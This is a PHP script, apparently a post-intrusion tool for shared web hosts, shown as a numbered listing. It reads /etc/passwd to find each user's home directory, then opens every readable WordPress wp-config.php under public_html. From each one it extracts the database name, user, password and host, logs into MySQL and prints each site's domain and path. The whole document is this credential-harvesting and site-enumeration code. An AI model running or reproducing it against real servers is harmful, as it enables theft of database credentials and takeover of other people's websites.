<?phperror_reporting(0);$handle = @fopen("/etc/passwd", "r");if ($hand

1. <?php
2.  
3.  
4. error_reporting(0);
5. $handle = @fopen("/etc/passwd", "r");
6. if ($handle) {
7. while (($buffer = fgets($handle, 4096)) !== false)
8. {
9. $buffer=trim($buffer);
10. $buffer=strstr($buffer,"/");
11. $buffer=substr($buffer,0,strpos($buffer,":"));
12. $buffer=trim($buffer);
13.  
14.  
15.  
16.  
17.  
18. //---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
19.  
20.  
21. $dir=$buffer."/public_html/";
22.  
23. if(is_readable($dir."/wp-config.php") && $dirs[$i]!=".")
24. {
25. $handle1 = @fopen($dir."/wp-config.php", "r");
26. $data=array();
27.  
28. if($handle1)
29. {
30. $dbname="";$dbuser="";$dbpassword="";$dbhost="";$table_prefix="";
31.  
32. while(($buffer = fgets($handle1, 4096)) !== false)
33. {
34.  
35. if(strstr($buffer,"DB_NAME")){$dbname=strstr($buffer,",");$dbname=strstr($dbname,"'");$dbname=substr($dbname,1,strrpos($dbname,"'")-1);$dbname=trim($dbname);}
36. if(strstr($buffer,"DB_USER")){$dbuser=strstr($buffer,",");$dbuser=strstr($dbuser,"'");$dbuser=substr($dbuser,1,strrpos($dbuser,"'")-1);$dbuser=trim($dbuser);}
37. if(strstr($buffer,"DB_PASSWORD")){$dbpassword=strstr($buffer,",");$dbpassword=strstr($dbpassword,"'");$dbpassword=substr($dbpassword,1,strrpos($dbpassword,"'")-1);$dbpassword=trim($dbpassword);}
38. if(strstr($buffer,"DB_HOST")){$dbhost=strstr($buffer,",");$dbhost=strstr($dbhost,"'");$dbhost=substr($dbhost,1,strrpos($dbhost,"'")-1);$dbhost=trim($dbhost);}
39. if(strstr($buffer,"table_prefix")){$table_prefix=strstr($buffer,"'");$table_prefix=substr($table_prefix,1);$table_prefix=substr($table_prefix,0,strrpos($table_prefix,"'"));$table_prefix=trim($table_prefix);}if($table_prefix==""){$table_prefix=strstr($buffer,"\"");$table_prefix=substr($table_prefix,1);$table_prefix=substr($table_prefix,0,strrpos($table_prefix,"\""));$table_prefix=trim($table_prefix);}
40.  
41. }
42.  
43. $g_link = mysql_connect($dbhost, $dbuser, $dbpassword);
44. if($g_link)
45. {
46. mysql_select_db($dbname, $g_link);
47. $result=mysql_query("SELECT option_value FROM `".$table_prefix."options` where option_name='siteurl'");
48. $data=mysql_fetch_assoc($result);
49.  
50. $id=$data['ID'];
51. $user=$data['user_login'];
52. $password=$data['user_pass'];
53. $result=mysql_query("SELECT option_value FROM `".$table_prefix."options` where option_name='siteurl'");
54. $row = mysql_fetch_assoc($result);$site=$row['option_value'];$site=str_replace("http://","",$site);$site=str_replace("https://","",$site);if(strstr($site,"/")){$site=substr($site,0,strpos($site,"/"));}$site=str_replace("www.","",$site);
55. echo($site."\r\n");
56. echo($dir."\r\n");
57. }
58. }
59.  
60. }
61.  
62.  
63. //---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
64.  
65.  
66. if(is_readable($dir))
67. {
68. $dirs = scandir($dir);
69.  
70. for($i=0;$i<count($dirs);$i++)
71. {
72.  
73. //��������� ���������� � ������
74. //-----------------------------------------------------------------------------------
75. if(strstr($dirs[$i],".") && substr($dirs[$i],0,1)!="." && is_dir($dir.$dirs[$i]))
76. {
77. echo($dirs[$i]."\r\n");
78. echo($dir."\r\n");
79. }
80. //-----------------------------------------------------------------------------------
81.  
82. if(is_readable($dir."/".$dirs[$i]."/wp-config.php") && $dirs[$i]!=".")
83. {
84. $handle1 = @fopen($dir."/".$dirs[$i]."/wp-config.php", "r");
85. $data=array();
86.  
87. if($handle1)
88. {
89. $dbname="";$dbuser="";$dbpassword="";$dbhost="";$table_prefix="";
90.  
91. while(($buffer = fgets($handle1, 4096)) !== false)
92. {
93.  
94. if(strstr($buffer,"DB_NAME")){$dbname=strstr($buffer,",");$dbname=strstr($dbname,"'");$dbname=substr($dbname,1,strrpos($dbname,"'")-1);$dbname=trim($dbname);}
95. if(strstr($buffer,"DB_USER")){$dbuser=strstr($buffer,",");$dbuser=strstr($dbuser,"'");$dbuser=substr($dbuser,1,strrpos($dbuser,"'")-1);$dbuser=trim($dbuser);}
96. if(strstr($buffer,"DB_PASSWORD")){$dbpassword=strstr($buffer,",");$dbpassword=strstr($dbpassword,"'");$dbpassword=substr($dbpassword,1,strrpos($dbpassword,"'")-1);$dbpassword=trim($dbpassword);}
97. if(strstr($buffer,"DB_HOST")){$dbhost=strstr($buffer,",");$dbhost=strstr($dbhost,"'");$dbhost=substr($dbhost,1,strrpos($dbhost,"'")-1);$dbhost=trim($dbhost);}
98. if(strstr($buffer,"table_prefix")){$table_prefix=strstr($buffer,"'");$table_prefix=substr($table_prefix,1);$table_prefix=substr($table_prefix,0,strrpos($table_prefix,"'"));$table_prefix=trim($table_prefix);}if($table_prefix==""){$table_prefix=strstr($buffer,"\"");$table_prefix=substr($table_prefix,1);$table_prefix=substr($table_prefix,0,strrpos($table_prefix,"\""));$table_prefix=trim($table_prefix);}
99.  
100. }
101.  
102. $g_link = mysql_connect($dbhost, $dbuser, $dbpassword);
103. if($g_link)
104. {
105. mysql_select_db($dbname, $g_link);
106. $result=mysql_query("SELECT option_value FROM `".$table_prefix."options` where option_name='siteurl'");
107. $data=mysql_fetch_assoc($result);
108.  
109. $id=$data['ID'];
110. $user=$data['user_login'];
111. $password=$data['user_pass'];
112. $result=mysql_query("SELECT option_value FROM `".$table_prefix."options` where option_name='siteurl'");
113. $row = mysql_fetch_assoc($result);$site=$row['option_value'];$site=str_replace("http://","",$site);$site=str_replace("https://","",$site);if(strstr($site,"/")){$site=substr($site,0,strpos($site,"/"));}$site=str_replace("www.","",$site);
114. echo($site."\r\n");
115. echo($dir."/".$dirs[$i]."\r\n");
116. }
117. }
118.  
119.  
120. }
121.  
122.  
123. }
124. }
125.  
126. }
127. }
128.  
129.  
130.  
131.  
132. ?>